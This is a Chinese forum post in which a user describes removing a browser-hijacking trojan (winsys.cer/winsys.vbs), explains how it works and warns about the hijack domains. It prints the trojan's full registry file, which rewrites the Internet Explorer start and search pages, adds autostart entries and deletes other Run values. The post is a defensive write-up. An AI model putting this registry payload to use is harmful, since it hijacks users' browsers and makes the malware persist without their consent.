- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 注册时间
- 2007-3-9
- 最后登录
- 2007-3-9
|
[原创]一次清理病毒的启示
[这个贴子最后由cambrigelq在 2004/01/24 01:55am 第 1 次编辑]
今日我在家上网,打开IE后发现主页被篡改,成了www.ok741.com,我以为只是中了普通的恶意代码,把注册表恢复了一下,重起后再打开IE,结果还是被改过的主页,再进注册表一看也是被改过的。心想该检查一下了,就打开金山,结果扫到了vbs脚本病毒,再进开机启动列表一看,真多出来个奇怪的选项 regedit -s C:\$NtUninstallQ887678$\WINSYS.cer,来自这个目录c:\$NtUninstallQ8875736$
也许大家都知道这个病毒了吧,就是winsys.cer和winsys.vbs。关于杀毒方法我只是简单说说,禁用开始选项→导入备份的注册表(要是没备份只好一点点的改喽)→清理IE→重起。网上关于杀这个毒的介绍很多也很详细,大家可以自己去搜一下。
回头我把winsys.cer这个危险物用记事本打开一看,原来是reg格式文件,内容如下:
(下面的注册表键值就是病毒修改的地方,显然要全部改回去)
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.ok741.com"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.ok741.com"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main]
"Search Page"="http://www.ok741.com"
"Default_Search_URL"="http://www.ok741.com"
"Search Bar"="http://www.ok741.com"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.ok741.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.ok741.com"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.ok741.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.ok741.com/"
"First Home Page"="http://www.ok741.com"
"Default_Search_URL"="http://www.ok741.com"
"Search Page"="http://www.ok741.com"
"Search Bar"="http://www.ok741.com"
"Local Page"="http://www.ok741.com/"
[-HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
@="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="http://www.ok741.com/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="http://www.ok741.com"
"Search Page"="http://www.ok741.com"
"Search Bar"="http://www.ok741.com"
"SearchURL"="http://www.ok741.com"
"Start Page"="http://www.ok741.com/"
"First Home Page"="http://www.ok741.com"
"Default_Page_URL"="http://www.ok741.com/"
"Local Page"="http://www.ok741.com/"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WlN32"="C:\\$NtUninstallQ887678$\\WINSYS.vbs"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WlN32"="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
又把winsys.vbs打开一看,弄清了病毒的原理:恶意网站利用漏洞或ActiveX控件释放的vbs文件,脚本在目录“C:\$NtUninstallQ887678$”下自动释放 winsys.cer文件,并写入注册表自启动项“regedit -s C:\$NtUninstallQ887678$\WINSYS.cer”,显然,每次启动时, winsys.cer的内容便导入注册表,这些内容就是是修改IE主页和其他设置的恶意码。后来了解到这个木马叫Junk.HomePage.haoabc,隐藏在网页中来传播,并且主要是在一些音乐、电影网站中,大家注意了,像qq730.com ok741.com yy234.com
都是。
其实这篇文章并没有太难的技术问题,只是引出了几条大家应注意的问题,如木马的隐藏地,注册表的备份,浏览网站时的安全问题等。还有对于初次中招的同志们,在遇到这类问题时不要慌,还没看清问题就到急于网上求救,其实像winsys这类问题,如果自己能分析一下,会发现这类问题是很简单的,平时都做过。如此自己分析问题,对自己水平的提高也很有帮助。 |
|
